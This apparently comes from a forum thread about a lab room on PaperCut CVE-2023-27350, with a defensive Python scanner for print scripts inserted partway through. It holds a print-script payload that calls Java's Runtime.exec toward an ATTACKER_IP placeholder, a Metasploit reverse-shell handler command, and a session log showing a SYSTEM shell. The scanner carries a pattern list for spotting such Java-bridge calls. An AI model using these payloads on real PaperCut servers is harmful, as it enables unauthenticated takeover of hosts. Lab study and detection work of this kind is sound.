PaperCut: CVE-2023-27350 Discussion

Let’s discuss PaperCut: CVE-2023-27350. Please do not share any flags or writeups.

To heighten the severity of this issue, the executed scripts run in the context of the PrintCut service, which, in turn, executes as the fully privileged NT AUTHORITY\SYSTEM account on Windows installations (or the root account on Linux). Therefore, abusing this functionality gives a previously unauthenticated threat actor full privileges over the host!

Sad.

Very interesting.

As the scripts are executed through JavaScript, to perform code execution, we can simply use the Java exec() function to execute our code. We can therefore alter the code as follows.

//
// Customize your print process with Print Scripting.  You don't have to be a
// programmer to use Print Scripting.  Use one of the many pre-written recipes
// already written for you, or write your own in JavaScript using snippets and
// reference documentation.
//
function printJobHook(inputs, actions) {
	// your script here
}
java.lang.Runtime.getRuntime().exec('ping.exe ATTACKER_IP');
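For defenders, the useful takeaway from the snippet above is that a Rhino-style JavaScript engine exposes the whole Java runtime to the script, so a print script should never contain calls into `java.lang.Runtime` or `ProcessBuilder`. The following scanner is an added example written for this thread, not code from the room or from PaperCut: it strips comments (so the stock header text does not trigger) and flags Java-bridge constructs in a stored print script. The pattern list, the `pc-app`-independent heuristics, and the benign sample using `inputs.job.totalPages` / `actions.job.cancel()` are assumptions for illustration; both sample scripts are constructed inline.

```python
import re

# Heuristic indicators (assumed for this example) of a script reaching out of the
# JavaScript sandbox into the Java runtime of the host process.
JAVA_BRIDGE_PATTERNS = {
    "runtime_exec": re.compile(r"java\.lang\.Runtime\b"),
    "process_builder": re.compile(r"java\.lang\.ProcessBuilder\b"),
    "packages_namespace": re.compile(r"\bPackages\."),
    "import_class": re.compile(r"\bimportClass\s*\("),
    "import_package": re.compile(r"\bimportPackage\s*\("),
    "exec_call": re.compile(r"\.exec\s*\("),
}


def strip_comments(source: str) -> str:
    """Blank out // and /* */ comments while preserving line numbering."""
    # Replace block comments with the same number of newlines they spanned.
    no_block = re.sub(
        r"/\*.*?\*/",
        lambda m: "\n" * m.group(0).count("\n"),
        source,
        flags=re.S,
    )
    # Line comments are simply dropped to end of line.
    return re.sub(r"//[^\n]*", "", no_block)


def scan_print_script(source: str):
    """Return a list of (indicator, line_number, line_text) for each hit."""
    findings = []
    for lineno, line in enumerate(strip_comments(source).splitlines(), start=1):
        for name, pattern in JAVA_BRIDGE_PATTERNS.items():
            if pattern.search(line):
                findings.append((name, lineno, line.strip()))
    return findings


def is_suspicious(source: str) -> bool:
    """True when any Java-bridge indicator is present outside comments."""
    return bool(scan_print_script(source))


# Constructed sample: the stock script header plus the out-of-function exec call
# discussed in the thread (ATTACKER_IP is the page's own placeholder).
SUSPICIOUS_SCRIPT = """//
// Customize your print process with Print Scripting.
//
function printJobHook(inputs, actions) {
	// your script here
}
java.lang.Runtime.getRuntime().exec('ping.exe ATTACKER_IP');
"""

# Constructed sample of an ordinary policy script; the inputs/actions API names
# are assumed here for illustration.
BENIGN_SCRIPT = """function printJobHook(inputs, actions) {
  // Cancel very large jobs. Mentioning java.lang.Runtime in a comment is fine.
  if (inputs.job.totalPages > 500) {
    actions.job.cancel();
  }
}
"""


if __name__ == "__main__":
    for label, script in (("suspicious", SUSPICIOUS_SCRIPT), ("benign", BENIGN_SCRIPT)):
        hits = scan_print_script(script)
        print(f"{label}: {'FLAG' if hits else 'ok'}")
        for name, lineno, text in hits:
            print(f"  line {lineno}: {name}: {text}")
```

Run it against the scripts stored by the application (or against a backup of its configuration) as a periodic integrity check; a hit on a script that is supposed to contain only queue policy is worth treating as an incident rather than a false positive.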

How can JS execute Java code??

Okay I figured it out.

The scripts are written in JavaScript and execute in the context of the PrintCut service – which runs as NT AUTHORITY\SYSTEM on Windows deployments.

I like this.

┌──(kali㉿kali)-[/tmp/CVE-2023-27350]
└─$ msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/shell/reverse_tcp; set LHOST 10.11.76.25 ; set LPORT 4444; exploit"
[*] Using configured payload generic/shell_reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
LHOST => 10.11.76.25
LPORT => 4444
[*] Started reverse TCP handler on 10.11.76.25:4444 
[*] Sending stage (240 bytes) to 10.10.126.229
[*] Command shell session 1 opened (10.11.76.25:4444 -> 10.10.126.229:49966) at 2024-08-21 19:24:52 -0400


Shell Banner:
Microsoft Windows [Version 10.0.17763.1821]
-----
          

C:\Program Files\PaperCut NG\server>whoami
nt authority\system